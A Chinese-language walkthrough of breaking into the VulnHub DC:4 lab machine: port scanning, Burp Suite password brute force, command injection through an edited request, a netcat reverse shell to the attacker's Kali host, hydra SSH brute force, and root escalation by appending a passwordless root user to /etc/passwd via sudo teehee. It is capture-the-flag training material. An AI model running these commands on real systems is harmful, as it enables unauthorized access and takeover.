准备工作
在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/
导入到vmware,设置成NAT模式
打开kali准备进行渗透(ip:192.168.200.6)
信息收集
利用nmap进行ip端口探测
nmap -sS 192.168.200.6/24
探测到ip为192.168.200.15的靶机,开放了22端口和80端口
再用nmap对所有端口进行探测,确保没有别的遗漏信息
nmap -sV -p- 192.168.200.15
先看看80端口,打开网站是一个登陆界面
dirsearch扫描没有发现别的页面
用Wappalyzer插件查看发现是Nginx1.15.10框架
使用searchsploit查找也没有关于这个版本的漏洞
看来只能尝试弱口令爆破了
弱口令爆破
这里使用BurpSuite,也可以使用hydra
抓个包发送到intruder设置positions,选择cluster bomb模式将账号密码设置为两个变量
在进入payload设置变量,因为是admin后台管理系统,所以账号是admin是确定的
在将字典导入到密码的变量中(字典可以在网上找)
根据返回长度可以看到happy就是密码,登陆到后台看看
里面的界面有三个选项都是一些系统命令,看起来好像可以通过抓包来更改命令
抓包之后发现确实可以更改
Netcat反弹shell
用nc命令反弹shell给kali
使用方法参考NC使用笔记_LainWith的博客-CSDN博客
先在终端输入nc -lvp 9999开启监听
然后在bp输入命令反弹shell
nc -e /bin/sh 192.168.200.6 9999
使用python 通过pty.spawn()获得交互式shell
python -c'import pty;pty.spawn("/bin/bash")'
在home目录下找到了三个用户的文件夹
在jim文件中找到了密码的备份文件,使用hydra连接ssh进行爆破
hydra爆破
使用示例:
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
-l 后面跟着 具体的用户名
-p 后面跟着 具体的密码
-L 后面跟着 用户字典
-P 后面跟着 密码字典
先将密码保存在psw文件中,然后开始爆破
hydra -l jim -P psw -t 4 ssh://192.168.200.15
过程有点慢,但是得到密码jibril04,连接看看
ssh jim@192.168.200.15 -p 22
成功连上
这里看到说有一个邮件,找找看在哪
在/var/mail 中找到 内容是:
给了一个charles的密码 ^xHhA&hvim0y,切换登陆看看su charles
可以看到无论是cat命令和进入root文件夹都被限制了,只能看看怎么提权
权限提升
先用sudo -l看看有什么用户可以获得root权限
发现teehee不需要密码可以有root权限,可以利用teehee提权
用teehee用户添加一个admin用户
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
然后直接切换到admin用户就有root权限了